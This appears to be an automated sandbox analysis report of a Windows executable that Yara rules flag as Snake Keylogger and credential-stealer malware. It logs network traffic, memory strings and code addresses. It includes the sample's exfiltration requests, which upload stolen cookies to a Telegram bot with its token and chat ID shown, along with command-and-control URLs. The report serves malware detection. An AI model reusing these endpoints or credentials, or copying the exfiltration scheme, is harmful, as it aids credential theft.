Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49753 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd329d9dfe367aHost: api.telegram.orgContent-Length: 1277

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 07:08:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49824 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.x8M2g1Xxhz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

PE file contains section with special chars

Source: x8M2g1Xxhz.exe	Static PE information: section name:
Source: x8M2g1Xxhz.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_004028B0	0_2_004028B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C	0_2_005A110C
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00574920	0_2_00574920
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005AE9AE	0_2_005AE9AE
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_004E89B9	0_2_004E89B9
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00418244	0_2_00418244
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A8A49	0_2_005A8A49
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005AB287	0_2_005AB287
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00632B09	0_2_00632B09
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_004193C4	0_2_004193C4
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00402B90	0_2_00402B90
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_004073A0	0_2_004073A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043AC4F	0_2_0043AC4F
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00408C60	0_2_00408C60
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0040DC11	0_2_0040DC11
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A4C2D	0_2_005A4C2D
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00407C3F	0_2_00407C3F
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005704D1	0_2_005704D1
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00418CCC	0_2_00418CCC
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00406CA0	0_2_00406CA0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0041A4BE	0_2_0041A4BE
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0049BD43	0_2_0049BD43
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0057E549	0_2_0057E549
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043BDCE	0_2_0043BDCE
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A65E3	0_2_005A65E3
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00401650	0_2_00401650
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_006326CE	0_2_006326CE
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0059F70C	0_2_0059F70C
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00402F20	0_2_00402F20
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A97E5	0_2_005A97E5
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00418788	0_2_00418788
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00402F89	0_2_00402F89
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471C4E0	0_2_0471C4E0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471D4E0	0_2_0471D4E0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471A598	0_2_0471A598
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_04717630	0_2_04717630
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471D7B8	0_2_0471D7B8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471D20B	0_2_0471D20B
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471CC58	0_2_0471CC58
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_04716D2F	0_2_04716D2F
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_04712EF8	0_2_04712EF8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471EEE0	0_2_0471EEE0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471CF30	0_2_0471CF30
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471586F	0_2_0471586F
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471C980	0_2_0471C980
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471D4EB	0_2_0471D4EB
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0471C6A8	0_2_0471C6A8
